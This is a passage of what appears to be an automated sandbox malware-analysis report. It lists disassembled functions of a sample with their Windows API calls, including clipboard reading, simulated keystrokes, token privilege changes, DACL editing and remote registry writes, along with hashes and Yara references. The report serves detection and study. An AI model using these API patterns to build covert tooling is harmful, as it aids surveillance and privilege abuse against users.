                    • Instruction Fuzzy Hash: B912C171500608ABEB659F25CC49FBE7BB8EF45710F204129FA15EA2E1DF709A49CB12
                    Function 00C8710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                    • API String ID: 1357608183-1798697756
                    • Opcode ID: 3f3eb47c8226b8f95e25fefad944737401c94a27d0eb058cb25cb9a51ef20df9
                    • Instruction ID: 39889ee758d508137831a762d97fd29fea159e91c2a26ba90cd88d011a2aa79b
                    • Opcode Fuzzy Hash: 3f3eb47c8226b8f95e25fefad944737401c94a27d0eb058cb25cb9a51ef20df9
                    • Instruction Fuzzy Hash: F193CF71A00219DFDB28DF98D891BADB7B1FF48314F24816EE955EB280E7709E81CB54
                    Function 00C74A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32(00000000,?), ref: 00C74A3D
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CADA8E
                    • IsIconic.USER32(?), ref: 00CADA97
                    • ShowWindow.USER32(?,00000009), ref: 00CADAA4
                    • SetForegroundWindow.USER32(?), ref: 00CADAAE
                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CADAC4
                    • GetCurrentThreadId.KERNEL32 ref: 00CADACB
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CADAD7
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00CADAE8
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00CADAF0
                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00CADAF8
                    • SetForegroundWindow.USER32(?), ref: 00CADAFB
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CADB10
                    • keybd_event.USER32(00000012,00000000), ref: 00CADB1B
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CADB25
                    • keybd_event.USER32(00000012,00000000), ref: 00CADB2A
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CADB33
                    • keybd_event.USER32(00000012,00000000), ref: 00CADB38
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CADB42
                    • keybd_event.USER32(00000012,00000000), ref: 00CADB47
                    • SetForegroundWindow.USER32(?), ref: 00CADB4A
                    • AttachThreadInput.USER32(?,?,00000000), ref: 00CADB71
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 4125248594-2988720461
                    • Opcode ID: be16446f1e2e19a40bc55db4441c38cdc258dc7898721a35686b5eff3d59a2b2
                    • Instruction ID: eedd86647fe36fd84be6b658c51b87e9622c129cd551bd6fb8cae0d1c19c76db
                    • Opcode Fuzzy Hash: be16446f1e2e19a40bc55db4441c38cdc258dc7898721a35686b5eff3d59a2b2
                    • Instruction Fuzzy Hash: CA315371A40318BFEB216F619C49FBE7E6CEF45B50F114029FA06EA1D0CAB05D41EAB5
                    Function 00CE425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                    Download Yara Rule
                    APIs
                    • OpenClipboard.USER32(00CFF910), ref: 00CE4284
                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00CE4292
                    • GetClipboardData.USER32(0000000D), ref: 00CE429A
                    • CloseClipboard.USER32 ref: 00CE42A6
                    • GlobalFix.KERNEL32(00000000), ref: 00CE42C2
                    • CloseClipboard.USER32 ref: 00CE42CC
                    • GlobalUnWire.KERNEL32(00000000), ref: 00CE42E1
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00CE42EE
                    • GetClipboardData.USER32(00000001), ref: 00CE42F6
                    • GlobalFix.KERNEL32(00000000), ref: 00CE4303
                    • GlobalUnWire.KERNEL32(00000000), ref: 00CE4337
                    • CloseClipboard.USER32 ref: 00CE4447
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Clipboard$Global$Close$AvailableDataFormatWire$Open
                    • String ID:
                    • API String ID: 941120096-0
                    • Opcode ID: 0e8ba6115e18a184f5e76834912acbc93a746b18160c5503448c9e1b2cd1da79
                    • Instruction ID: 304b766f8e6868623803a4019d4535620ea31a2166fb7fb88133bf502ed8125a
                    • Opcode Fuzzy Hash: 0e8ba6115e18a184f5e76834912acbc93a746b18160c5503448c9e1b2cd1da79
                    • Instruction Fuzzy Hash: 54519A31204246ABD315AF61EC86F7E77A8EF84B00F10452DF65AD22E1DF70DA06DB62
                    Function 00CC8858 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 224COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00CC8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CC8D0D
                      • Part of subcall function 00CC8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CC8D3A
                      • Part of subcall function 00CC8CC3: GetLastError.KERNEL32 ref: 00CC8D47
                    • _memset.LIBCMT ref: 00CC889B
                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00CC88ED
                    • CloseHandle.KERNEL32(?), ref: 00CC88FE
                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00CC8915
                    • GetProcessWindowStation.USER32 ref: 00CC892E
                    • SetProcessWindowStation.USER32(00000000), ref: 00CC8938
                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00CC8952
                      • Part of subcall function 00CC8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CC8851), ref: 00CC8728
                      • Part of subcall function 00CC8713: CloseHandle.KERNEL32(?,?,00CC8851), ref: 00CC873A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                    • String ID: $default$winsta0
                    • API String ID: 2063423040-1027155976
                    • Opcode ID: 35e45e1578a6b05ddf66b045c9bd36f03716c40106271ee2aedd5e65805238f9
                    • Instruction ID: fe656423a5d3b7699b4cf483bb26edb2a4e0d263ed2ae76d9531538a76a55db0
                    • Opcode Fuzzy Hash: 35e45e1578a6b05ddf66b045c9bd36f03716c40106271ee2aedd5e65805238f9
                    • Instruction Fuzzy Hash: B8811971900219AEDF15DFA4DC45FAFBBB8EF04304F18416EF924A6261DB318E19EB61
                    Function 00CDC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 00CDC9F8
                    • FindClose.KERNEL32(00000000), ref: 00CDCA4C
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CDCA71
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CDCA88
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CDCAAF
                    • __swprintf.LIBCMT ref: 00CDCAFB
                    • __swprintf.LIBCMT ref: 00CDCB3E
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                    • __swprintf.LIBCMT ref: 00CDCB92
                      • Part of subcall function 00C938D8: __woutput_l.LIBCMT ref: 00C93931
                    • __swprintf.LIBCMT ref: 00CDCBE0
                      • Part of subcall function 00C938D8: __flsbuf.LIBCMT ref: 00C93953
                      • Part of subcall function 00C938D8: __flsbuf.LIBCMT ref: 00C9396B
                    • __swprintf.LIBCMT ref: 00CDCC2F
                    • __swprintf.LIBCMT ref: 00CDCC7E
                    • __swprintf.LIBCMT ref: 00CDCCCD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                    • API String ID: 3953360268-2428617273
                    • Opcode ID: cdf667813ef9410d74a1171e13fdb1e8ec11857199f719cf19cd8702f5051434
                    • Instruction ID: 23bb33620781488a77ec0ee6d9a1df5730a691082403c26f27ccac3789c7f7f3
                    • Opcode Fuzzy Hash: cdf667813ef9410d74a1171e13fdb1e8ec11857199f719cf19cd8702f5051434
                    • Instruction Fuzzy Hash: ADA12FB1508345ABC710EB64C985DAFB7ECFF94700F40892EF59AC6191EB34DA09DB62
                    Function 00CDF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00CDF221
                    • _wcscmp.LIBCMT ref: 00CDF236
                    • _wcscmp.LIBCMT ref: 00CDF24D
                    • GetFileAttributesW.KERNEL32(?), ref: 00CDF25F
                    • SetFileAttributesW.KERNEL32(?,?), ref: 00CDF279
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00CDF291
                    • FindClose.KERNEL32(00000000), ref: 00CDF29C
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00CDF2B8
                    • _wcscmp.LIBCMT ref: 00CDF2DF
                    • _wcscmp.LIBCMT ref: 00CDF2F6
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CDF308
                    • SetCurrentDirectoryW.KERNEL32(00D2A5A0), ref: 00CDF326
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CDF330
                    • FindClose.KERNEL32(00000000), ref: 00CDF33D
                    • FindClose.KERNEL32(00000000), ref: 00CDF34F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                    • String ID: *.*
                    • API String ID: 1803514871-438819550
                    • Opcode ID: b150e804854592407e6d98c7128df2a85ae508974a4eec195c548c3850a12e5d
                    • Instruction ID: ab111c85ad73870485975aeeca36dcfde1299eb82e63d15a9db075cb33ebc9a2
                    • Opcode Fuzzy Hash: b150e804854592407e6d98c7128df2a85ae508974a4eec195c548c3850a12e5d
                    • Instruction Fuzzy Hash: 7A31A6765002196BDB10DBB4DC89BEE77ACEF08360F1441BEEA15D32A0DB30DB46CA65
                    Function 00CF0AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF0BDE
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00CFF910,00000000,?,00000000,?,?), ref: 00CF0C4C
                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00CF0C94
                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00CF0D1D
                    • RegCloseKey.ADVAPI32(?), ref: 00CF103D
                    • RegCloseKey.ADVAPI32(00000000), ref: 00CF104A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Close$ConnectCreateRegistryValue
                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                    • API String ID: 536824911-966354055
                    • Opcode ID: 8a3e8b11ba5737a17796a9a5d9f71a4ccc06ba08fc0837dd1a47d9ab9bd95f82
                    • Instruction ID: ed0e2005b00b23ae2e8730b92172bdb384c5755e311e7eab9e83633a714bc9f1
                    • Opcode Fuzzy Hash: 8a3e8b11ba5737a17796a9a5d9f71a4ccc06ba08fc0837dd1a47d9ab9bd95f82
                    • Instruction Fuzzy Hash: 81027D752006519FCB14EF14C885E2ABBE5FF88724F14885DF99A9B362CB30ED41DB82
                    Function 00CFC8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfilenativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • DragQueryPoint.SHELL32(?,?), ref: 00CFC917
                      • Part of subcall function 00CFADF1: ClientToScreen.USER32(?,?), ref: 00CFAE1A
                      • Part of subcall function 00CFADF1: GetWindowRect.USER32(?,?), ref: 00CFAE90
                      • Part of subcall function 00CFADF1: PtInRect.USER32(?,?,00CFC304), ref: 00CFAEA0
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00CFC980
                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CFC98B
                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CFC9AE
                    • _wcscat.LIBCMT ref: 00CFC9DE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CFC9F5
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00CFCA0E
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00CFCA25
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00CFCA47
                    • DragFinish.SHELL32(?), ref: 00CFCA4E
                    • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00CFCB41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                    • API String ID: 2166380349-3440237614
                    • Opcode ID: ff0161a084b2ebeecf23458a623b2e82229e3329f572682d706feadd98b9efea
                    • Instruction ID: 554dd426872afbef13c47809c7fc1465dc9a3ac62e3b22e6242f8bb960b7354c
                    • Opcode Fuzzy Hash: ff0161a084b2ebeecf23458a623b2e82229e3329f572682d706feadd98b9efea
                    • Instruction Fuzzy Hash: A5616D71508304AFC711DF64DC85EAFBBF8EF88750F00492EF695921A1DB709A49DB62
                    Function 00CDF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00CDF37E
                    • _wcscmp.LIBCMT ref: 00CDF393
                    • _wcscmp.LIBCMT ref: 00CDF3AA
                      • Part of subcall function 00CD45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00CD45DC
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00CDF3D9
                    • FindClose.KERNEL32(00000000), ref: 00CDF3E4
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00CDF400
                    • _wcscmp.LIBCMT ref: 00CDF427
                    • _wcscmp.LIBCMT ref: 00CDF43E
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CDF450
                    • SetCurrentDirectoryW.KERNEL32(00D2A5A0), ref: 00CDF46E
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CDF478
                    • FindClose.KERNEL32(00000000), ref: 00CDF485
                    • FindClose.KERNEL32(00000000), ref: 00CDF497
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                    • String ID: *.*
                    • API String ID: 1824444939-438819550
                    • Opcode ID: f8a8263ea079d4883d35780075facdb3d50685f8c852d1fabe0b652f972e3808
                    • Instruction ID: bf3d0c147caa51b5d914334f04774170d157cd60d02a090c0b47866f41154c77
                    • Opcode Fuzzy Hash: f8a8263ea079d4883d35780075facdb3d50685f8c852d1fabe0b652f972e3808
                    • Instruction Fuzzy Hash: 9D31D77550111D6FCF10ABA4EC88BEF77ACEF09324F1401BAEA11A32A0D730DB46DA65
                    Function 00CFC49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CFC4EC
                    • GetFocus.USER32 ref: 00CFC4FC
                    • GetDlgCtrlID.USER32(00000000), ref: 00CFC507
                    • _memset.LIBCMT ref: 00CFC632
                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00CFC65D
                    • GetMenuItemCount.USER32(?), ref: 00CFC67D
                    • GetMenuItemID.USER32(?,00000000), ref: 00CFC690
                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00CFC6C4
                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00CFC70C
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CFC744
                    • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00CFC779
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                    • String ID: 0
                    • API String ID: 3616455698-4108050209
                    • Opcode ID: 95b4360eab7bf4d4f18473abdbf10eeaf3ad19d8c0d7863203dd16df34e02c9c
                    • Instruction ID: 6e49f8e4d4d62004e2a8147ce36f2c9aa263dd94cb5ee9453c691c3eaf8b4598
                    • Opcode Fuzzy Hash: 95b4360eab7bf4d4f18473abdbf10eeaf3ad19d8c0d7863203dd16df34e02c9c
                    • Instruction Fuzzy Hash: 02818C70208349AFD750DF14CAC4A7ABBE4EF88354F00492EFAA5D7291D770DA05DBA2
                    Function 00CC81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00CC874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CC8766
                      • Part of subcall function 00CC874A: GetLastError.KERNEL32(?,00CC822A,?,?,?), ref: 00CC8770
                      • Part of subcall function 00CC874A: GetProcessHeap.KERNEL32(00000008,?,?,00CC822A,?,?,?), ref: 00CC877F
                      • Part of subcall function 00CC874A: RtlAllocateHeap.NTDLL(00000000,?,00CC822A), ref: 00CC8786
                      • Part of subcall function 00CC874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CC879D
                      • Part of subcall function 00CC87E7: GetProcessHeap.KERNEL32(00000008,00CC8240,00000000,00000000,?,00CC8240,?), ref: 00CC87F3
                      • Part of subcall function 00CC87E7: RtlAllocateHeap.NTDLL(00000000,?,00CC8240), ref: 00CC87FA
                      • Part of subcall function 00CC87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00CC8240,?), ref: 00CC880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CC825B
                    • _memset.LIBCMT ref: 00CC8270
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CC828F
                    • GetLengthSid.ADVAPI32(?), ref: 00CC82A0
                    • GetAce.ADVAPI32(?,00000000,?), ref: 00CC82DD
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CC82F9
                    • GetLengthSid.ADVAPI32(?), ref: 00CC8316
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00CC8325
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00CC832C
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CC834D
                    • CopySid.ADVAPI32(00000000), ref: 00CC8354
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CC8385
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CC83AB
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CC83BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 2347767575-0
                    • Opcode ID: 086888be7abfba494f809ecb32150f0342f90a0a55287fde08bb145a1419c49c
                    • Instruction ID: d4cff8bfd1641fa71490f52e4fe8e0677742f8d24423f758aa404c5a5491c266
                    • Opcode Fuzzy Hash: 086888be7abfba494f809ecb32150f0342f90a0a55287fde08bb145a1419c49c
                    • Instruction Fuzzy Hash: F6612C71A00249BBDF109F94DC84FAEBB79FF04700F14826DF825A72A1DB319A09DB60
